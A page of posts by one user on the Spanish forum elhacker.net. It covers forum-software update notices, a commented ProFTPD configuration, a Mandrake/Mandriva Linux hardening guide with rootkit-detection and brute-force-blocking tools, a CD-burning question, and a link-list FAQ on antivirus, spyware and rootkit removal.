elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


  Mostrar Temas
Páginas: 1 ... 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 [33] 34 35 36
321  Foros Generales / Sugerencias y dudas sobre el Foro / Actualizado el foro ---> SMF 1.0 Beta 5 Public. en: 27 Abril 2004, 20:59 pm
Ya está instalado la nueva versión del Foro SMF....

En principio funciona todo bien, pero si algo fallara, o no se ve correctamente, tal como una imagen, etc, lo podéis comentar en este mensaje.

Faltan bastantes cosas por traducir (están en Inglés), estoy a la espera que salga el "Lenguaje Español" (la traducción) del SMF 1.0 Beta 5 Public.

Gracias.
322  Foros Generales / Sugerencias y dudas sobre el Foro / Nueva URL para el foro (foro.elhacker.net) en: 24 Abril 2004, 16:32 pm
Después de multitud de problemas con la velocidad de carga del foro y otros problemas técnicos que impedian la correcta visualización del foro..... el foro cambia de URL y pasa a ser:

http://foro.elhacker.net

Se puede seguir entrando por http://www.elhacker.net/foro, pero serás automáticamente redirigido hacia la nueva url.

Es necesario volverse a autentificar y la nueva cookie ya quedará correctamente guardada.

Se ha activado una opción parecida al "SMART URL'S" que lleva incluida el SMF, que quita las ? (variables) de las urls.

También ha sido arreglada la plantilla y se visualiza correctamente con los navegadores:

- Internet Explorer 6.0 y superiores

- Mozilla Firefox

Los temas pegados que incluyen enlaces al foro ya están operativos

Se acabaron ya los problemas de:

Citar
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.


Las personas que no pueden ver el foro o no lo han podido ver es por causa de la propagación de las DNS.
323  Foros Generales / Sugerencias y dudas sobre el Foro / Problemas técnicos con el foro en: 20 Abril 2004, 00:03 am
Hola,

Hay probemas técnicos en el foro:

Citar
Connection Problems
Sorry, SMF was unable to connect to the database. This may be caused by the server being busy. Please try again later.

Si aparece este error y otros, pues estoy intento arreglarlo.

Disculpad las molestias, espero poderlo solucionar lo antes posible.
324  Foros Generales / Sugerencias y dudas sobre el Foro / [MOD]Nueva plantilla (Diseño) del foro y nueva versión SMF instalada en: 3 Abril 2004, 13:35 pm
Se ha cambiado la plantilla del foro por una nueva.... y con la nueva versión del Yabbse (la SMF) (ya instalada)

Que nadie se asuste, ya que sólo cambia la "apariencia" pero los mensajes sigue siendo los mismos :P

Gracias a todos los que han colaborado en el nuevo diseño de esta plantilla.

Muy especialmente a morris, cuántico, javier, etc por el diseño de la nueva plantilla, así cómo de los logos, etc.

Ahora con la nueva versión SMF del foro, hay más opciones para el usuario, más estadísticias, etc.
325  Informática / Tutoriales - Documentación / Servidor FTP para Linux --> ProFTPD en: 9 Marzo 2004, 21:28 pm
v0.5

Se instala en paquete rpm o desde las fuentes ya la instalación se hace desde el:

/etc/proftpd.conf

Aquí te dejo un ejemplo de configuración, con cada linea comentada:

Código:
DefaultServer on
#nombre del servidor de ftp (sale al entrar)
ServerName "ProFTPD Server de el-brujo"
#tipo de servidor
ServerType standalone
#e-mail del administrador del ftp
ServerAdmin admin@elhacker.net
#si no pones password en 120 segundos te hecha
TimeoutLogin         120
#sino haces nada en el ftp, en 900 segundos cierra la conexion
TimeoutNoTransfer               900

TimeoutIdle 600
#usuario que ejecutar el servidor ftp
User nobody
#grupo
Group nogroup
#si ves que tarda mucho entre que te conectas al ftp y te pide el login, es porque está haciendo el reverso de tu ip, y siempre tarda. Si quieres que sea directo pon:
UseReverseDNS                   off
<Global>
#por defecto, un usuario que quiera entrar al ftp, tiene que tener una shell válida (/bin/sh) o la que sea, pero si tiene /bin/false, no le dejará entrar al ftp, aunque el pass sea correcto. Esto se puede arreglar con esto-->
RequireValidShell off
#parecido al reverso de dns
IdentLookups                    off
#puedes limitar que solo entren desde una ip
#<Limit LOGIN>
#Order allow,deny
#Allow from 192.168.0.2
#Deny from all
#</Limit>

#puedes limitar los usuarios que tienen acceso al ftp
<Limit LOGIN>
Order allow,deny
AllowUser pepe,juan
#AllowUser root
Deny all
</Limit>
#mensaje si el pass es incorrecto
AccessDenyMsg "que te pires"
#mensaje de bievenida, %u significa el user que se conecte
AccessGrantMsg "Bienvenido %u , al servidor ftp de el-brujo"

#permite sobre-escribir archivos (y como esta dentro de global, pues de todos
AllowOverwrite on

#maximo de conexiones simulteneas
MaxClients 5 "Muchas conexiones simultaneas..... espera un rato"

#numero maximo de clientes por ip
MaxClientsPerHost 2 "Desde tu IP ya hay dos conexiones conectadas."

#mensaje
DisplayGoAway "Demasiadas conexiones, espera un rato y vuelve a intentar"

#numero maximo de fallos al poner el pass
MaxLoginAttempts 4

<Limit WRITE>
AllowAll
</Limit>

AllowRetrieveRestart on
AllowStoreRestart on
LoginPasswordPrompt off
DirFakeGroup on ~
DirFakeUser on ~
</Global>
#RootLogin on
#DefaultRoot /usr/local/apache root

#al entrar el usuario pepe, le lleva a este directorio y no puede tirar para atrás,solo para delante

DefaultRoot /home/pepe/public_html pepe
DefaultRoot /home/juan/public_html juan


# si está on, muestra / en vez de mostrar /home/pepe/public_html

DirFakeGroup on ~
DirFakeUser on ~

# podemos cambiar por defecto los perimsos de un archivo o directorio que se suba
<Directory /home/backup>
#umask fichero carpeta
#simplemente resta a 666 026 para obtener el nuevo permiso
Umask 026 027
#Umask 0133 0444
</Directory>

#vamos a hacer un directorio donde la gente pueda subir cosas, pero no borrarlas, ni sobreescribir ficheros
<Directory /home/upload*>
Umask 026 027
#no dejamos borra ficheros, ni carpeta, si cambiar permisos, etc
        <Limit READ RMD DELE RNFR RNTO SITE_CHMOD CHMOD>
                DenyAll
        </Limit>

#dejamos subir ficheros, cambiar de directorios y hacer resume
 <Limit STOR CWD RETR>
                AllowAll
        </Limit>
AllowOverwrite off


Documentos interesantes:
http://proftpd.linux.co.uk/docs/directives/configuration_full.html
http://bandaancha.st/documentos.php?docid=65
http://www.castaglia.org/proftpd/modules/mod_tls.htmlç
http://www.esdebian.org/article.php?story=20050721192144149
326  Foros Generales / Sugerencias y dudas sobre el Foro / Nuevo sistema de URL'S en el Foro en: 30 Enero 2004, 22:01 pm
Se ha activado el MOD SMART URL's para el foro Yabbse.

Este "mod" acorta las URLS y las libra de variables php para que los buscadores detecten mejor las páginas del foro.

Las antiguas URLS (las originales) siguen estando disponibles y accesibles.

Ejemplo:

Foro de dudas y comentarios:

Antes (por defecto)

Citar

Esta URL sigue funcionando con normalidad.

Pero ahora sale por defecto:

Citar

Los buscadores como google no son amantes de las URLS largas y con muchas variables tipo:

Citar

y prefieren

Citar

no sólo porque sea más corta, sino porque no contiene tantas variables php.



Para las personas que quiera hacer esto mismo en su página web -->

Google_Mod

¿Qué es?

Sirve para que google indexe tus páginas webs.

El problema es que google no indea las urls largas con variables tipo:

http://www.miforo.org/index.php?board=58;action=display;threadid=396

pero si este tipo:

http://www.miforo.org/index.php/tal/preguntas/t396.php

Y estas modificaciones eliminan las variables y lo convierten todo en texto puro y duro.

En phpbb pasaría de:

viewtopic.php?t=157 a --> ftopic28.html

Citar

327  Informática / Tutoriales - Documentación / Seguridad en Linux Mandriva en: 16 Enero 2004, 19:36 pm
Versión 1.92

WindowsUpdate con Mandrake 9.2/10.0

Si queremos tener Mandrake 9.2 actualizado con los últimos parches, al más puro estilo "WindowsUpdate", podemos seguir estos sencillos pasos.

Paso Previo)

Necesitamos la herramienta "urpmi" explicada anterioramente. Debemos añadir la fuente "updates", que no es más que un directorio dónde están las actulizaciones de Mandrake 9.2

Citar
urpmi.addmedia --update updates http://ftp://ftp.cica.es/pub/Linux/Mandrakelinux/official/updates/9.2/RPMS with ../base/hdlist.cz

Para Mandrake 10.0:

Citar
urpmi.addmedia --update updates10 http://ftp://ftp.surfnet.nl/pub/os/Linux/distr/Mandrake/official/updates/10.0/RPMS with ../base/hdlist.cz

Más mirrors de updates:

http://www.mandrakesecure.net/en/ftp.php

Nos dirijimos a la página web:

Citar

o

Citar

Miramos los últimos "advisories", para saber que paquete rpm ha sido actualizado. Si el paquete tal tiene una vulnerabilidad, procedemos a actualizarlo.

Acto seguido vamos a a la consola y escribimos:

Citar
urpmi --media updates nombre_paquete

Se actualizarán todos los paquetes vulnerables.

Si falla algo, quizás tenemos que actualizar las fuentes:

Citar
urpmi.update --all

Niveles de Seguridad en Mandrake

Mandrake tiene 5 niveles de seguridad. Estos niveles de seguridad incluyen unos scripts (msec) que revisan el sistema.

El nivel normal es el 3. El nivel 1 y 2 no son nada aconsejables (sería para un ordenador sin conexión a internet). El nivel 4 es para un servidor (aunque también se puede usar el 3 con algunas modificaciones) y el nivel 5 es el modo paranóico.

Código:
msec 3

También existe una herramienta gráfica:

Código:
draksec

La configuración del msec se guarda en:

Código:
/var/lib/msec/security.conf.

Más info:
http://mandrakeuser.org/docs/mdoc/ref/prog-msec.html

Actualizando el kernel en Mandrake

Explicación de tipos de kernel en Mandrake:

kernel-2.4 = Optimizado para i589, un solo procesador, soporta menos de 1GB de RAM, aproximadamente 880MB máximo.

kernel-enterprise-2.4 = Optimizado para i686, con soporte SMP (multiprocesador), admite hasta 4GB de RAM.

kernel-i686-up-4GB-2.4 = Optimizado para i686, un solo procesador, admite hasta 4GB de RAM.

kernel-p3-smp-64GB-2.4 = Optimizado para PentiumIII, soporte SMP (multiprocesador), admite hasta 64GB de RAM.

kernel-secure-2.4 = Optimizado para i586, soporte multiprocesador, no admite memorias grandes, asegurado con grsec.

kernel-smp-2.4 = Optimizado para i586, soporte multiprocesador, no admite memorias grandes

kernel2.4-marcelo-2.4 = Optimizado para i586, uniprocesador, no admite memorias grandes.

Más info sobre esto:
http://mandrake.badopi.org/node/view/1320

Tenemos que tener configurada nuestra "fuente" de "updates"

Citar
urpmi.addmedia --update updates10 http://ftp://ftp.surfnet.nl/pub/os/Linux/distr/Mandrake/official/updates/10.0/RPMS with ../base/hdlist.cz

Actualizamos la fuente (aunque ya lo hemos hecho antes con el --update.
Citar
# urpmi.update -a


Bajamos el nuevo kernel, podemos elegir entre la rama 2.4 o la nueva rama 2.6:

Código:
 # urpmi kernel-2.4.25.4mdk-1-1mdk.i586.rpm

Código:
 # urpmi kernel-2.6.3.9mdk-1-1mdk.i586.rpm

Si te aparece un error como éste:

Citar
Can't call method "L" without a package or object reference at /usr/sbin/detectloader line 127.

Prueba de hacer:

# detectloader

y te saldrá lo mismo.

La manera de arreglarlo es usar -l en vez de -L:

Busca el archivo /usr/sbin/detectloader

Código:
        $return = $1 if m|^boot=(\S*)$| and not $return;
     }
     close F;

quita esta linea
Código:
    $return = readlink($return) if -L $return;

y pon esta:

Código:
    $return = readlink($return) if -l $return;

lo demás igual:  

  return $return;
 }

Ahora solo tenemos que configurar correctamente el Lilo, para añadir el nuevo kernel, y el viejo por si algo falla.

Antes de hacer el urpmi, teniamos algo así:

Código:
image=/boot/vmlinuz
label="linux"
root=/dev/hda7
initrd=/boot/initrd.img
read-only

Ahora debería quedar algo así:

Código:
image=/boot/vmlinuz-2.4.25.4mdk-1-1mdk
label=2419-24
root=/dev/hda1
read-only
optional
initrd=/boot/initrd-2.4.25.4mdk-1-1mdk

Este es el nuevo kernel. Recuerda que vmlinuz y initrd.img suelen ser enlaces simbólicos (así que mira su destino).

Ahora añadimos el viejo (por si a caso):

Código:
image=/boot/vmlinuz-2.4.19-16mdk
label="linux-oldkernel"
root=/dev/hda7
initrd=/boot/initrd-2.4.19-16mdk.img
read-only

Y por últimos, lo probamos y ejecutamos el lilo claro:

Código:
# lilo -v

Es un poco cutre, pero es sencillo y no es necesario compilar, ni bajar módulos, ni nada más.

Otra manera es bajar el kernel-src.mdk y reconstruirlo:

Código:
rpm --rebuild --target ARCH kernel.VERSION.src.rpm

Dónde ARCH puede ser: noarch, i386, i486, i586, i686, athlon, ...

Código:
rpm -ivh /usr/src/RPM/RPMS/ARCH/kernel.VERSION.ARCH.rpm


Linux kernel patch from the Openwall Project
http://www.openwall.com/linux/README.shtml

Características generales

Non-executable user stack area.
Restricted links in /tmp.
Restricted FIFOs in /tmp.
Restricted /proc.
Special handling of fd 0, 1, and 2 (Linux 2.0 and 2.2 only).
Enforce RLIMIT_NPROC on execve(2).
Destroy shared memory segments not in use
Privileged IP aliases (Linux 2.0 only).

Libsafe

Libsafe is a middle-ware solution to format string attacks and buffer overflows. It provides a dynamically loadable LD_PRELOAD replacement. The LD_PRELOAD replacement is used to replace common functions known to have format string or BOF issues. LibSafe is an ideal solution to stop many issues in simple and basic software – for example the Linux x86 'traceroute' utility has had a history of format string issues, libsafe essentially puts a lid around most of those past/present/future issues.

http://www.research.avayalabs.com/project/libsafe/
http://forums.ev1servers.net/showthread.php?s=7915a47f5ce451541ec152a7f399a085&threadid=13009


APF (Advanced Policy Firewall)
http://www.r-fx.org/apf.php

Entorno Chrooted (Jail)
http://www.jmcresearch.com/projects/jail/howto.html

# Remove SUID or SGID bits, if any exist:
find . -type f -exec chmod ug-s {} \;

chkrootkit
+ info --> http://www.chkrootkit.org/
chkrootkit es una pequeña aplicacion que sirve para detectar los rootkits más comunes. No es infalible.

Instalación:

Citar
#necesitamos ser root
su -

#nos bajamos la ultima version
wget http://ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz

#comprobamos firma con http://ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.md5
md5sum chkrootkit.tar.gz

#descomprimimos
tar xvzf chkrootkit.tar.gz

#entramos al directorio
cd chkrootkit_version_tal

#compilamos
make sense

#probamos
./chkrootkit  

#el resultado tiene que ser "not found", "not infected",etc.

Hay más parametros para usar, consultar documentación.

Otra herramienta parecida al chkrootkit:

Rootkit Hunter

bajar:
wget http://downloads.rootkit.nl/rkhunter-1.2.8.tar.gz

descomprimir:
# tar zxf rkhunter-<version>.tar.gz

Instalar :D
# cd rkhunter
# ./installer.sh

rhkunter luego para hacerlo funcionar.

Tiger

http://www.nongnu.org/tiger/


Bastille

Bastille Linux
http://www.bastille-linux.org/

tar -xjvf Bastille.tar.bz2

2) Run the Install.sh script:

cd Bastille && ./Install.sh

Type: "bastille" to start the full custom hardening script.

AIDE

AIDE (Advanced Intrusion Detection Environment)

Otros: Nabou, Tripwire

Don't forget: Reboot the machine when you're done!
Montar /tmp con noexec
nosuid,noexec

Instalación de Force Brute Detection

BFD es un script que analiza los logs en busca de intentos fallidos de conexión y bloque las ips de los atacantes.

Instalación:

wget http://www.rfxnetworks.com/downloads/bfd-current.tar.gz

tar xvzf bfd-current.tar.gz

cd bfd-0.2

Ejecutar el instalador: ./install.sh

.: BFD installed
Install path: /usr/local/bfd
Config path: /usr/local/bfd/conf.bfd
Executable path: /usr/local/sbin/bfd

Editar el archivo de configuración:
pico /usr/local/bfd/conf.bfd

Activar alertas contra intentos de brute force hack:
Buscar: ALERT_USR="0" CAMBIALO A: ALERT_USR="1"

Busca: EMAIL_USR="root" CAMBIALO A: EMAIL_USR="mi_nombre@mimail.com"

Guarda los cambios: Ctrl+X then Y

Evitar que te banee a ti mismo
pico -w /usr/local/bfd/ignore.hosts y añade tus IPS. (con las que accedes al servidor, las de conexión a internet Ej: 192.168.1.1)

BFD usa la habilidad de inserción de APF' cli
y añadirá las IPS que intentan entrarte al archivo de IPS baneadas por lo que es importante añadir tus IPS al archivo de allow_hosts.rules para evitar que te blockee el acceso al servidor.

Ejecutar el Programa
/usr/local/sbin/bfd -s


UNIX Security Checklist v2.0
http://www.auscert.org.au/render.html?it=1935&cid=1920



Falta explicar cada cosa y poner fuentes (yo sólo traduzco del inglés, pero añado alguna cosa y lo explico a mi manera.)
328  Informática / Software / Grabar ISO de 697 MB en CD de 700 MB en: 19 Noviembre 2003, 10:16 am
Bueno no estoy todavía muy puesto en el tema y cuando intento grabar una ISO de 697 MB con el Nero 5.5.10.50 me dice que no hay espacio suficiente en el CD-R.....

He probado de activar el overburning ese a 120 minutos, pero sigue sin funcionar.

En teoría cabe, porque he mirado el "Medium  information" del CD-R y son 79 minutos o algo así y la iso son 74 minutos, pero nastis de plastis.

¿cómo se hace o qué hago mal?
329  Seguridad Informática / Seguridad / Normas y Temas Frecuentes en Seguridad en: 11 Noviembre 2003, 08:31 am
Normas
Las normas de este subforo son las mismas que las del foro en general, procurad respetarlas:

CAREN v0.9 - Reglamento de Convivencia y Contenido.
http://foro.elhacker.net/sugerencias_y_dudas_sobre_el_foro/caren_v10_reglamento_de_convivencia_y_contenido-t17721.0.html

Recordad que no se permite pedir cracks, seriales, keygens o similares en el foro:

¿Buscas algún crack o serial? Prohibido pedirlos en el foro.
http://foro.elhacker.net/software/iquestbuscas_algun_crack_o_serial_prohibido_pedirlos_en_el_foro-t3756.0.html

Por último, en los temas en los que el usuario que pregunta postea un log del programa HijackThis, no podrán publicar correcciones al log aquellos usuarios que no tengan certeza de lo que dicen, no valiendo simplemente la intuición, puesto que un uso incorrecto del programa puede ocasionar graves problemas. El usuario deberá seguir las indicaciones recibidas bajo su propia responsabilidad.

*- [AIO elhacker.NET] Compilación herramientas análisis y desinfección malware
http://foro.elhacker.net/seguridad/aio_elhackernet_compilacion_herramientas_analisis_y_desinfeccion_malware-t353888.0.html

Descarga:
http://ns2.elhacker.net/aio/AIO_elhacker_2012.rar


¿ Es tu pc un zombie ?

F-Bot de f-secure - Elimina el Agobot y todas sus variantes
http://www.f-secure.com/tools/f-bot.zip


¿No sabes si un fichero tiene virus?

Analizalo mediante el uso de múltiples motores antivirus.

http://www.virustotal.com/es/indexf.html
http://vscan.novirusthanks.org/
http://anubis.iseclab.org/
http://virusscan.jotti.org/
http://virscan.org/

Escáner de puertos online
http://www.t1shopper.com/tools/port-scanner/

Citar
Más seguridad, programas necesarios, qué necesito para tener un pc 100% seguro, etc.

Manual de seguridad by ROBOKOP.
http://foro.elhacker.net/tutoriales_documentacion/manual_de_seguridad_by_robokop-t122059.0.html

Estoy seguro ???
http://foro.elhacker.net/seguridad/estoy_seguro-t21822.0.html

ayuda como pongo mi pc al 100% en seguridad
http://foro.elhacker.net/seguridad/seguridad-t12983.0.html

como pudedo tener mi pc tot4l mente seguro¿?'
http://foro.elhacker.net/seguridad/como_pudedo_tener_mi_pc_tot4l_mente_seguroiquest-t16304.0.html

Seguridad
http://foro.elhacker.net/seguridad/ayuda_como_pongo_mi_pc_al_100_en_seguridad-t38206.0.html




Citar
Seguridad y Virus

Extensiones de seguridad y privacidad para Firefox
http://foro.elhacker.net/seguridad/para_la_seguridad_en_internet_cual_es_el_mejor_browser-t125233.0.html;msg585035#msg585035

Que FIREWALL me recomiendan???
http://foro.elhacker.net/seguridad/que_firewall_me_recomiendan-t16119.0.html

Comparando Cortafuegos (firewalls)
http://foro.elhacker.net/seguridad/comparando_cortafuegos_firewalls-t5034.0.html

cual es el mejor firewall?
http://foro.elhacker.net/seguridad/iquestcual_es_el_mejor_firewalliquesty_donde_me_lo_puedo_bajar_gratis-t20922.0.html

BORRAR UN KEYLOGGER
http://foro.elhacker.net/seguridad/borrar_un_keylogger-t20954.0.html

Virus en el MSN: wode.jpg
http://foro.elhacker.net/seguridad/virus_en_el_msn_wodejpg-t40974.0.html

Algunos fix virus ::Aqui::
http://foro.elhacker.net/seguridad/algunos_fix_virus_aqui-t186905.0.html



Citar
Consejos y recuperación de la cuenta del MSN/Hotmail

Consejo Básico: Contraseña de HOTMAIL
http://foro.elhacker.net/seguridad/consejo_basico_contrasena_de_hotmail-t54833.0.html

Aprenda a proteger su PC
http://www.microsoft.com/spain/protect/default.mspx

Boletines de seguridad
http://www.microsoft.com/spain/technet/security/bulletin/current.mspx

Guías de Seguridad
http://www.microsoft.com/spain/technet/security/guidance/default.mspx

Reg's Windows
http://foro.elhacker.net/windows/regs_windows-t49495.0.html

Recopilación De Boletines Sobre Seguridad Informática.
http://foro.elhacker.net/seguridad/recopilacion_de_boletines_sobre_seguridad_informatica-t49974.0.html

Restablecer Contraseña De Hotmail o MsN"Es la unica Forma"
http://foro.elhacker.net/chats_irc_y_messengers/restablecer_contrasena_de_hotmail_o_msnes_la_unica_forma-t29908.0.html

[MOD]Me han quitado mi correo y quiero aprender a defenderme
http://foro.elhacker.net/seguridad/modme_han_quitado_mi_correo_y_quiero_aprender_a_defenderme-t25649.0.html

ME ROBARON MI CUENTA CON KEYLOGGERS
http://foro.elhacker.net/seguridad/me_robaron_mi_cuenta_con_keyloggers-t27434.0.html

Problema con contraseña hotmail
http://foro.elhacker.net/chats_irc_y_messengers/problema_con_contrasena_hotmail-t21124.0.html

¿Como evitar que te roben tu cuenta de Hotmail?
http://foro.elhacker.net/chats_irc_y_messengers/iquestcomo_evitar_que_te_roben_tu_cuenta_de_hotmail-t25430.0.html

Seguridad
http://foro.elhacker.net/seguridad/seguridad-t12983.0.html

Seguridad en el XP
http://foro.elhacker.net/seguridad/seguridad_en_el_xp-t116496.0.html

Guia Basica de Seguridad en WinXP
http://foro.elhacker.net/seguridad/guia_basica_de_seguridad_en_winxp-t14608.0.html

Consejos Basicos de Seguridad
https://foro.elhacker.net/seguridad/consejos_basicos_de_seguridad-t15658.0.html

Recomendaciones de Seguridad del UNAM-CERT para usuarios Windows
http://foro.elhacker.net/seguridad/recomendaciones_de_seguridad_del_unamcert_para_usuarios_windows-t49187.0.html

Seguridad para "Usuarios de a pie":
http://foro.elhacker.net/seguridad/seguridad_para_usuarios_de_a_pie-t363753.0.html

7 huellas que dejas en el PC con Windows sin saberlo
http://foro.elhacker.net/seguridad/7_huellas_que_dejas_en_el_pc_sin_saberlo-t356559.0.html



Citar
Mejor Antivirus

Mejor Antivirus?
http://foro.elhacker.net/seguridad/mejor_antivirus_encuesta-t12363.0.html

Diferencia entre antivirus
http://foro.elhacker.net/seguridad/diferencia_entre_antivirus-t17871.0.html

que antivirus me recomendais...
http://foro.elhacker.net/seguridad/que_antivirus_me_recomendais-t24286.0.html

que les parece el antivirus PC-CILLIN ???
http://foro.elhacker.net/seguridad/que_les_parece_el_antivirus_pccillin-t26255.0.html

Sobre Antivirus
http://foro.elhacker.net/seguridad/sobre_antivirus-t11632.0.html

¿Es bueno instalar 5 antivirus al mismo tiempo?
http://foro.elhacker.net/seguridad/iquestes_bueno_instalar_5_antivirus_al_mismo_tiempo-t20315.0.html

Usar más de un antivirus
http://foro.elhacker.net/seguridad/usar_mas_de_un_antivirus-t20718.0.html

Antivirus mas peligrosos que....
http://foro.elhacker.net/seguridad/antivirus_mas_peligrosos_que-t26758.0.html

q antivirus funciona para un pentium 200??
http://foro.elhacker.net/seguridad/q_antivirus_funciona_para_un_pentium_200-t33754.0.html

Antivirus q consuma pocos recursos
http://foro.elhacker.net/seguridad/antivirus_q_consuma_pocos_recursos-t49413.0.html



Citar
Privacidad

borrar historial de google
http://foro.elhacker.net/windows/borrar_historial_de_google-t31435.0.html

como borrar las URLs de el Explorador
http://foro.elhacker.net/dudas_generales/como_borrar_las_urls_de_el_explorador-t21764.0.html

Borrar historial de Internet explorer
http://foro.elhacker.net/windows/borrar_historial_de_internet_explorer-t40400.0.html

Problema con Internet Explorer
http://foro.elhacker.net/software/problema_con_internet_explorer-t29965.0.html

Dudas sobre: Internet Explorer
http://foro.elhacker.net/windows/dudas_sob_internet_explorer-t37263.0.html



Citar
Honeypots

Honeypots - Servidores Trampa por EleKtr0 (Electron Security Team) - MAGNIFICO
http://foro.elhacker.net/hacking_avanzado/honeypots_servidores_trampa_por_elektr0_electron_security_team_magnifico-t55380.0.html



Citar
IDS

IDS PARA WINDOWS
http://foro.elhacker.net/hacking_avanzado/ids_para_windows-t55161.0.html

¿Como puedo saber si un sistema Linux ha sido comprometido? (TEXTO)
http://foro.elhacker.net/hacking_linuxunix/iquestcomo_puedo_saber_si_un_sistema_linux_ha_sido_comprometido_texto-t36767.0.html

Snort: Detección de intrúsos y ataques
http://foro.elhacker.net/seguridad/snort_deteccion_de_intrusos_y_ataques-t181690.0.html



Citar
Sasser

*- Nuevo gusano similar al Blaster
http://foro.elhacker.net/analisis_y_diseno_de_malware/nuevo_gusano_similar_al_blaster-t30613.0.html

*- Utilidad para desinfectar el Sasser y todas sus versiones
http://foro.elhacker.net/seguridad/utilidad_para_desinfectar_el_sasser_y_todas_sus_versiones-t30856.0.html

*- W32.Sasser.Worm Definición y como solucionarlo
http://foro.elhacker.net/seguridad/w32sasserworm_definicion_y_como_solucionarlo-t30673.0.html

Nuevo gusano similar al Blaster
http://foro.elhacker.net/analisis_y_diseno_de_malware/nuevo_gusano_similar_al_blaster-t30613.0.html

*- Este no es el blaster!!!
http://foro.elhacker.net/dudas_generales/este_no_es_el_blaster-t30685.0.html

*- Puñetero blaster !!
http://foro.elhacker.net/analisis_y_diseno_de_malware/punetero_blaster-t30624.0.html

*- Se me apaga mi pc :( que puedo hacer?
http://foro.elhacker.net/windows/se_me_apaga_mi_pc_que_puedo_hacer-t30652.0.html

*- ayuda sasser
http://foro.elhacker.net/analisis_y_diseno_de_malware/ayuda_sasser-t30741.0.html

*- lsasss.exe?
http://foro.elhacker.net/analisis_y_diseno_de_malware/lsasssexe-t31113.0.html



Citar
Spyware, problema con la página de inicio, about:blank, páginas xxx, pop-ups que se abren solos, favoritos que se añaden solos, barras extrañas, etc

Eliminar Spywares, Adwares, Hijackers, Malware
http://foro.elhacker.net/seguridad/eliminar_spywares_adwares_hijackers_malware_virus_y_rootkits-t95234.0.html

¿Cómo leer un log de Hijackthis?. Y corregir posibles problemas
http://foro.elhacker.net/seguridad/iquestcomo_leer_un_log_de_hijackthis_y_corregir_posibles_problemas-t188566.0.html

ELIMINANDO CÓDIGOS MALICIOSOS EN WINDOWS by ghastlyX
http://foro.elhacker.net/seguridad/eliminando_codigos_maliciosos_en_windows-t133339.0.html

Cual es el Mejor Anti Spyware
http://foro.elhacker.net/seguridad/cual_es_el_mejor_anti_spyware-t53812.0.html

HijackThis [... y que les peten a los hijackers del explorer !]
http://foro.elhacker.net/tutoriales_documentacion/hijackthis_y_que_les_peten_a_los_hijackers_del_explorer-t37378.0.html

Problema con un Spyware
http://foro.elhacker.net/seguridad/problema_con_un_spyware-t40360.0.html

SPYWARE
https://foro.elhacker.net/seguridad/spyware-t32481.0.html

anti-spyware malinos
http://foro.elhacker.net/seguridad/antispyware_malinos-t43651.0.html

Eliminar Spyware
http://foro.elhacker.net/software/eliminar_spyware-t16664.0.html

Mysearchhow
http://foro.elhacker.net/seguridad/mysearchhow-t35842.0.html

Problema con Pagina de inicio en I.E 6.0
http://foro.elhacker.net/seguridad/problema_con_pagina_de_inicio_en_ie_60-t30411.0.html

Tutorial sobre el spyware
http://foro.elhacker.net/tutoriales_documentacion/tutorial_sobre_el_spyware-t17952.0.html

quitar la página de inicio
http://foro.elhacker.net/windows/quitar_la_pagina_de_inicio-t23701.0.html

PAGINA DE INICIO ERRONEA PERMANENTE
http://foro.elhacker.net/seguridad/pagina_de_inicio_erronea_permanente-t24746.0.html

sera un virus o algo parecido???
http://foro.elhacker.net/seguridad/sera_un_virus_o_algo_parecido-t23049.0.html

pagina de inicio
http://foro.elhacker.net/seguridad/pagina_de_inicio-t22998.0.html

spyware
http://foro.elhacker.net/chats_irc_y_messengers/spyware-t20047.0.html

Eliminar Spyware
http://foro.elhacker.net/chats_irc_y_messengers/spyware-t16664.0.html

Consulta sobre spywares
http://foro.elhacker.net/seguridad/consulta_sobre_spywares-t14604.0.html

Vos podes tener un spyware
http://foro.elhacker.net/seguridad/consulta_sobre_spywares-t12608.0.html



Citar
Rootkits

Eliminar y Detectar Rootkits
http://www.elhacker.net/eliminar-rootkits.html

Extirpación de un RootKIT
http://foro.elhacker.net/seguridad/extirpacion_de_un_rootkit-t16824.0.html

herramientas para detectar y eliminar R.k
http://foro.elhacker.net/dudas_generales/herramientas_para_detectar_y_eliminar_rk-t35574.0.html

DETECTANDO ROOTKITS
http://foro.elhacker.net/seguridad/detectando_rootkits-t85821.0.html



Citar
Virus Blaster

virus BLASTER ahora?????
http://foro.elhacker.net/analisis_y_diseno_de_malware/virus_blaster_ahora-t19121.0.html



Citar
Seguridad Puertos

como cierro puertos abiertos
http://foro.elhacker.net/seguridad/como_cierro_puertos_abiertos-t12337.0.html

Tutorial para prevenir ataques de troyanos y otros atraves de puertos
http://foro.elhacker.net/seguridad/tutorial_para_prevenir_ataques_de_troyanos_y_otros_atraves_de_puertos-t131699.0.html



Citar
Listado de Puertos

Lista de Puertos
http://foro.elhacker.net/redes/lista_de_puertos-t25952.0.html

Sobre puertos 999*
http://foro.elhacker.net/seguridad/sobre_puertos_999-t22889.0.html



Citar
Informática Forense

Introducción a la informática forense en entornos Windows 1ª parte
http://www.elhacker.net/InfoForenseWindows.htm

Introducción a la informática forense en entornos Windows 2ª parte
http://www.elhacker.net/InfoForenseWindows2.htm

Introducción a la informática forense en entornos Windows 3ª parte
http://www.elhacker.net/InfoForense3.html



Citar
Messenger Service, Mensajero, Pop-up

Necesito saber como hacer que no salga mas el messenger service
http://foro.elhacker.net/windows/necesito_saver_como_acer_que_no_salga_mas_el_messenger_service-t31452.0.html

posible virus.(service messenger)como lo quito
http://foro.elhacker.net/analisis_y_diseno_de_malware/posible_virusservice_messengercomo_lo_quito-t23963.0.html

messenger service sin permiso
http://foro.elhacker.net/seguridad/messenger_service_sin_permiso-t21384.0.html

Pop up me molesta.
http://foro.elhacker.net/dudas_generales/pop_up_me_molesta-t30119.0.html

Pop-up messenger
http://foro.elhacker.net/chats_irc_y_messengers/popup_messenger-t21696.0.html




Citar
¿Nos espian?

Carnivore
http://foro.elhacker.net/seguridad/carnivore-t12609.0.html

Echelon y spyware
http://foro.elhacker.net/seguridad/vos_podes_tener_un_spyware-t12608.0.html





Citar
Evitar dialers

http://foro.elhacker.net/dudas_generales/evitar_los_dialers-t18485.0.html

